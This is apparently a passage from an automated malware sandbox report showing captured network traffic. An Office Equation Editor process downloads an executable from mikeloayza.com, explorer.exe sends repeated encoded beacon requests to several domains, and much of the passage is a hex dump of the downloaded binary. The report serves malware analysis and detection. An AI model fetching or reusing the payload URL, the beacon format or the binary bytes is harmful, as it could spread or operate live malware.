                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mikeloayza.com/E9/i4L.exe">here</a>.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              2192.168.2.2249169216.239.34.2180C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 14, 2022 16:05:43.622512102 CET612OUTGET /i6ro/?1bwlC=EvZLIa9n10nRxiOVjDAbNaraserFHY+vFXfn78IjngAHha///qY0HtL3OeQWM3V4VGGKJg==&Lvkth=7nk0PH684p HTTP/1.1
                                              Host: www.fisioletsgo.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 14, 2022 16:05:43.705197096 CET614INHTTP/1.1 200 OK
                                              Content-Type: text/html; charset=utf-8
                                              x-ua-compatible: IE=edge
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Fri, 14 Jan 2022 15:05:43 GMT
                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                              Content-Security-Policy: script-src 'report-sample' 'nonce-vAqIb00c7GC8dZd6P1blJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self'
                                              Cross-Origin-Opener-Policy: unsafe-none
                                              Server: ESF
                                              X-XSS-Protection: 0
                                              X-Content-Type-Options: nosniff
                                              Set-Cookie: NID=511=t0rMwAPz15wcHq-ZRZW5NoRI-ZH07DBtt8c_PgorYqrriUVH4ipIrYKjh0ffHc_zo5WfwvEaQSObKe8qX6yuxP2EUIlFy0oNXZuNi94Oh3zy6wjFiGXNxN4f9T2NkgZyLMdkQ6GUZ6HRYUptkpWx82kms0-bAKO6cwgX8XjSpwQ; expires=Sat, 16-Jul-2022 15:05:43 GMT; path=/; domain=.google.com; HttpOnly
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Data Raw: 38 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 69 74 65 6d 73 63 6f 70 65 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 4c 6f 63 61 6c 42 75 73 69 6e 65 73 73 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 75 73 69 6e 65 73 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 73 63 72 69 70 74 20 64 61 74 61 2d 69 64 3d 22 5f 67 64 22 20 6e 6f 6e 63 65 3d 22 76 41 71 49 62 30 30 63 37 47 43 38 64 5a 64 36 50 31 62 6c 4a 41 22 3e 77 69 6e 64 6f 77 2e 57 49 5a 5f 67 6c 6f 62 61 6c 5f 64 61 74 61 20 3d 20 7b 22 44 70 69 6d 47 66 22 3a 66 61 6c 73 65 2c 22 45 35 7a 41 58 65 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 72 6b 73 70 61 63 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 2c 22 45 50 31 79 6b 64 22 3a 5b 22 2f 5f 2f 2a 22 2c 22 2f 6c 6f 63 61 6c 2f 62 75 73 69 6e 65 73 73 22 2c 22
                                              Data Ascii: 8000<!doctype html><html lang="en" dir="ltr" itemscope itemtype="https://schema.org/Locuseriness"><head><base href="http://business.google.com/"><meta name="referrer" content="origin"><script data-id="_gd" nonce="vAqIb00c7GC8dZd6P1blJA">window.WIZ_global_data = {"DpimGf":false,"E5zAXe":"https://workspace.google.com","EP1ykd":["/_/*","/local/business","


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              3192.168.2.2249171162.0.209.7380C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 14, 2022 16:05:53.933439016 CET632OUTGET /i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p HTTP/1.1
                                              Host: www.bitcointradel.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 14, 2022 16:05:54.111656904 CET634INHTTP/1.1 301 Moved Permanently
                                              keep-alive: timeout=5, max=100
                                              content-type: text/html
                                              content-length: 707
                                              date: Fri, 14 Jan 2022 15:05:54 GMT
                                              server: LiteSpeed
                                              location: https://www.bitcointradel.com/i6ro/?1bwlC=v8wCmtdiFaomFbCqPmTRfuzV09iQsBcARN7AuQ2Z2cmxW4qEZgdAIsAR7HDX+F8RHnJ1WA==&Lvkth=7nk0PH684p
                                              x-turbo-charged-by: LiteSpeed
                                              x-frame-options: SAMEORIGIN
                                              x-xss-protection: 1; mode=block
                                              x-content-type-options: nosniff
                                              strict-transport-security: max-age=31536000; includeSubDomains; preload;
                                              referrer-policy: no-referrer-when-downgrade
                                              connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              4192.168.2.224917234.102.136.18080C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 14, 2022 16:06:04.249555111 CET635OUTGET /i6ro/?1bwlC=/cyLrpDDSN6YuFUytusJvMs1Fa8HKgEew+X60dN8PRm9IS30Y+vwImEN4uFaxkThXcWLPQ==&Lvkth=7nk0PH684p HTTP/1.1
                                              Host: www.executive-air.net
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 14, 2022 16:06:04.365375996 CET635INHTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Fri, 14 Jan 2022 15:06:04 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "618be761-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              5192.168.2.2249173118.67.131.21780C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
                                              Jan 14, 2022 16:06:19.047626972 CET636OUTGET /i6ro/?1bwlC=p0eSlAztBYtTxVFAHr6whY3a3/Gvse9lKulyfm76J1CiWi63XOqEOX0vBd7zzyHot2+Q1w==&Lvkth=7nk0PH684p HTTP/1.1
                                              Host: www.luckyfandom.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 14, 2022 16:06:19.428003073 CET637INHTTP/1.1 302 Found
                                              Date: Fri, 14 Jan 2022 15:06:19 GMT
                                              P3P: CP="NOI CURa ADMa DEVa TAIa OUR DELa BUS IND PHY ONL UNI COM NAV INT DEM PRE"
                                              Location: /
                                              Content-Length: 0
                                              Content-Type: text/html; charset=euc-kr
                                              Age: 0
                                              Connection: close


                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249168131.153.37.4443C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              2022-01-14 15:04:35 UTC0OUTGET /E9/i4L.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Connection: Keep-Alive
                                              Host: mikeloayza.com
                                              2022-01-14 15:04:35 UTC0INHTTP/1.1 200 OK
                                              Date: Fri, 14 Jan 2022 15:04:34 GMT
                                              Server: Apache
                                              ETag: "92e00-5d5883126df7c"
                                              Accept-Ranges: bytes
                                              Content-Length: 601600
                                              Cache-Control: max-age=31536000
                                              Expires: Sat, 14 Jan 2023 15:04:34 GMT
                                              Vary: Accept-Encoding
                                              Referrer-Policy: no-referrer-when-downgrade
                                              Connection: close
                                              Content-Type: application/x-msdownload
                                              2022-01-14 15:04:35 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d3 47 e1 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 ee 07 00 00 3e 01 00 00 00 00 00 be 0d 08 00 00 20 00 00 00 20 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELGa> @ @
                                              2022-01-14 15:04:35 UTC16INData Raw: 12 00 28 13 00 00 0a a2 25 19 72 9d 06 00 70 a2 25 1a 02 7b 27 00 00 04 17 6f 72 00 00 0a 0a 12 00 28 13 00 00 0a a2 25 1b 72 ab 06 00 70 a2 25 1c 02 7b 27 00 00 04 18 6f 72 00 00 0a 0a 12 00 28 13 00 00 0a a2 25 1d 72 b9 06 00 70 a2 28 75 00 00 0a 0b 38 00 00 00 00 07 2a 00 22 02 28 34 00 00 06 00 2a 00 00 00 0a 17 2a 00 0a 16 2a 00 13 30 05 00 2b 00 00 00 10 00 00 11 00 03 02 7b 27 00 00 04 16 6f 72 00 00 0a 02 7b 27 00 00 04 17 6f 72 00 00 0a 9e 02 7b 26 00 00 04 17 58 0a 38 00 00 00 00 06 2a 00 13 30 04 00 47 00 00 00 15 00 00 11 00 03 6f 73 00 00 0a 18 fe 01 16 fe 01 0a 06 39 0c 00 00 00 00 72 bd 06 00 70 73 74 00 00 0a 7a 02 7b 27 00 00 04 03 16 6f 72 00 00 0a 6f 69 00 00 0a 00 02 7b 27 00 00 04 03 17 6f 72 00 00 0a 6f 69 00 00 0a 00 2a 00 13 30 06
                                              Data Ascii: (%rp%{'or(%rp%{'or(%rp(u8*"(4***0+{'or{'or{&X8*0Gos9rpstz{'oroi{'oroi*0
                                              2022-01-14 15:04:35 UTC32INData Raw: fa 24 52 a9 24 a4 64 aa 44 6b 5e 98 70 bd 1e 40 be 08 76 6c db 8a c3 07 0f e2 d0 a1 03 e8 dd b4 29 ef 71 33 a1 bf 14 d5 42 2f 94 09 bd 20 00 a2 58 bc 5c 2a 3e 8a a9 db 83 88 5d 3f 0d 79 d6 8c 0c 24 43 59 f1 fb 56 8f e1 81 85 cf 72 14 24 03 00 0e 12 c0 67 bf f0 e5 5c e8 4b 8e e9 cb df 36 17 f8 ea d5 09 b4 ee 7d 52 eb e2 17 8d e9 f5 5a 78 fd fb 33 73 55 45 81 a2 28 90 53 29 ec da f5 00 8e f4 f7 e3 48 ff 61 6c 32 0a fd 30 10 8b 97 0f b7 ae 04 4a 2c 9b 9c 19 c5 c4 ad 41 8c 5d 7d 09 a9 99 bb e5 65 50 f2 0c c4 f4 6b 55 07 11 54 7a 0d 44 37 ca c0 56 01 7c ee 4b cf b6 82 b1 e3 00 8e 31 ed 6f 3a 94 56 5b fc c5 dc 36 db 5b c8 5f 4e 65 2a 52 c9 54 ba b5 4f 15 2d 5b dc a2 17 8b 40 0b ba 0c 29 95 84 aa 28 50 15 05 52 2a 89 dd bb 77 63 60 60 00 03 03 03 e8 ed ed cd 7b
                                              Data Ascii: $R$dDk^p@vl)q3B/ X\*>]?y$CYVr$g\K6}RZx3sUE(S)Hal20J,A]}ePkUTzD7V|K1o:V[6[_Ne*RTO-[@)(PR*wc``{
                                              2022-01-14 15:04:35 UTC48INData Raw: aa a9 ff ab aa a9 ff ab aa a9 ff ab aa a9 ff ab aa a9 ff ab aa a9 ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff e4 e3 e1 ff d0 ce cc ff 9f 9c 98 ff 6d 6a 64 ff 5a 57 51 ff 66 63 5d ff 66 63 5d ff 66 63 5d ff 69 66 61 ff 7a 77 72 ff 7f 7c 78 ff 78 75 70 ff 63 5f 5a ff 59 56 50 ff 58 55 4e ff 57 54 4d ff 56 52 4c ff 55 51 4b ff 53 50 49 ff 52 4f 48 ff 51 4e 47 ff 50 4c 46 ff 54 50 4a ff 6b 68 62 ff 66 63 5e ff 63 5f 59 ff 46 42 3b ff 40 3c 35 ff 40 3c 35 ff 40 3c 35 ff 40 3c 35 ff 54 51 4b ff 7c 7a 76 ff 9e 9c 9b ff
                                              Data Ascii: mjdZWQfc]fc]fc]ifazwr|xxupc_ZYVPXUNWTMVRLUQKSPIROHQNGPLFTPJkhbfc^c_YFB;@<5@<5@<5@<5TQK|zv
                                              2022-01-14 15:04:35 UTC64INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii:
                                              2022-01-14 15:04:35 UTC80INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6b 67 62 ff 77 74 6f ff 71 6e 69 ff 61 5e 58 ff 8b 89 85 ff c9 b6 aa ff e7 e0 d1 ff 93 9c 7a ff 5a 6b 45 ff 84 85 63 ff c5 c2 b7 ff 7a 79 75 ff 49 46 3f ff 41 3d 36 ff 46 42 3b ff 72 6f 6a af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6d 6a 65 8f 5b 57 51 df 56 53 4c ff 4b 48 42 ff 50 4e 4a ff 89 87 85 ff ce ba ad ff e2 bd a4 ff a5 a1 9a ff 69 64 5b ff 48 44 3e ff 41 3d 36 ff 40 3c 35 af 40 3c 35 60 40 3c 35 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 4d 46 30 4c 48 42 8f 48 45 3e df 46 42 3b ff 43 3f 39 ff 49 45 3e ff 41 3d 36 ff 41 3d 36 af 40 3c 35 60 40 3c 35 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: kgbwtoqnia^XzZkEczyuIF?A=6FB;rojmje[WQVSLKHBPNJid[HD>A=6@<5@<5`@<5PMF0LHBHE>FB;C?9IE>A=6A=6@<5`@<5
                                              2022-01-14 15:04:36 UTC96INData Raw: c4 7f 7f 3f 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 97 30 4f 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 96 99 30 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 7f 3f 04 97 97 31 c5 97 99 31 ff 97 99 31 ff 97 99 31 76 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 91 91 24 07 96 97 30 d2 97 99 31 ff 97 99 31 ff 96 98 31 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa aa 2a 06 97 99 31 71 97 99 31 80 97 99 31 80 97 99
                                              Data Ascii: ?0O11111111110I?1111v$0111*1q11
                                              2022-01-14 15:04:36 UTC112INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 97 2f 3b 96 97 31 e3 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 96 97 31 de 97 97 2f 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: /;11111111111/
                                              2022-01-14 15:04:36 UTC128INData Raw: ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 97 31 d4 9a 9a 2e 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: 111111111111111111111111111111111111111111111111.!
                                              2022-01-14 15:04:36 UTC144INData Raw: ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 94 9a 2f 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: 111111111111111111111111111/0
                                              2022-01-14 15:04:36 UTC160INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 01 96 9a 32 4c 97 99 31 ce 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 95 97 2f f5 96 99 31 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: 2L111111111111/1X
                                              2022-01-14 15:04:36 UTC176INData Raw: ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 95 97 2f fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 98 2f db 97 99 31 ff 97 99 31 ff 96 97 30 cd 97 99 2f e7 97 99 31 ff 97 99 31 ff 95 99 31 ba 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99 31 ff 97 99
                                              Data Ascii: 11111111//110/11111111111111111111111111111
